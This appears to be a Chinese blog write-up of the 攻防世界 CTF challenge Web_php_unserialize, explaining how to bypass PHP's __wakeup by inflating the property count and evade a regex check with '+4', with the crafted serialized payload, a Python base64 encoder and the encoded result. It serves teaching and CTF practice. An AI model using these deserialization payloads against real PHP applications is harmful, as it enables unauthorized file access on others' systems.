攻防世界:Web_php_unserialize

攻防世界:Web_php_unserialize

本文知识点:

  1. php魔术方法(__wakeup)的绕过。 魔术方法 __wakeup() 是当php函数调用unserialize函数的时候自动调用的。但是当序列化后的属性的数量超过实际的数量 的时候,在特定的php版本是可以绕过__wakeup()方法的调用的。

    • 具体受影响的版本是**:PHP 5<5.6.25; PHP 7<7.0.10**

    一个简单的例子:

    php 复制代码
    <?php
    class Demo { 
        private $file = 'index.php';
        public function __construct($file) { 
            $this->file = $file; 
        }
    }
    ?>

    将上述代码序列化后的数据是: O:4:"Demo":1:{s:10:"\0Demo\0file";s:8:"fl4g.php";}

    将其改为:O:4:"Demo":2:{s:10:"\0Demo\0file";s:8:"fl4g.php";}便能够绕过魔术方法__wakeup的调用。

  2. 序列化数据显示:
    public 属性序列化的时候格式是正常成员名
    private 属性序列化的时候格式是\0类名\0成员名 : 比如"\0Demo\0file"
    protect 属性序列化的时候格式是\0*\0 成员名 :比如"\0*\0file"

  3. 正则表达式中,属性数量的绕过,可以将数字前面添加正号(如:+4)进行绕过

解题思路

对象的序列化:

php 复制代码
<?php
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
}
$a = new Demo("fl4g.php");
$b = serialize($a);
var_dump($b);
?>

上述代码的打印结果如下(注意\0的显示):

  1. 绕过正则表达式检查, 将4变为+4即可:

    O:+4:"Demo":1:{s:10:"\0Demo\0file";s:8:"fl4g.php";}

  2. __wakeup方法的绕过,就是将类的属性的数量增加(只要大于原始的数量1即可):

    O:+4:"Demo":2:{s:10:"\0Demo\0file";s:8:"fl4g.php";}

    O:+4:"Demo":3:{s:10:"\0Demo\0file";s:8:"fl4g.php";}

  3. 序列化数据,这里我使用的是python的方法,根据个人习惯即可,网上的题解一般使用的是php方法:

    python 复制代码
    import base64
    
    s = 'O:+4:"Demo":2:{s:10:"\0Demo\0file";s:8:"fl4g.php";}'
    print(base64.encodebytes(s.encode()).decode())

    输出的结果为: TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

  4. 将其通过变量var传递到服务端即可:

拿到结果:

相关推荐
kyriewen35 分钟前
Anthropic 估值逼近万亿美元,Claude Sonnet 5 + Claude Science 一天两连发
前端·ai编程·claude
小徐_23332 小时前
Wot UI 2.2.0 发布:Button 新增 subtle,VideoPreview 预览体验继续增强
前端·微信小程序·uni-app
天蓝色的鱼鱼4 小时前
关于 CSS 你可能不知道的属性,但关键时刻很有用
前端·css
泯泷5 小时前
第 2 篇:设计第一套字节码:Opcode、Instruction 与 Constant Pool
前端·javascript·安全
妙码生花5 小时前
从 PHP 到 AI + Golang,程序员自救转型手记(十五):优化细节、网络请求封装
前端·后端·ai编程
泯泷5 小时前
第 1 篇:从 1 + 2 开始:亲手写出第一台 JSVM
前端·javascript·安全
团团崽_七分甜5 小时前
Spring Boot 核心知识点总结
前端
lichenyang4535 小时前
从一个按钮开始,理解 ASCF 框架到底在做什么
前端
古夕6 小时前
第三方 SSO 接入实践:redirect_uri 编码、回调一致性与跨项目联调
前端·vue.js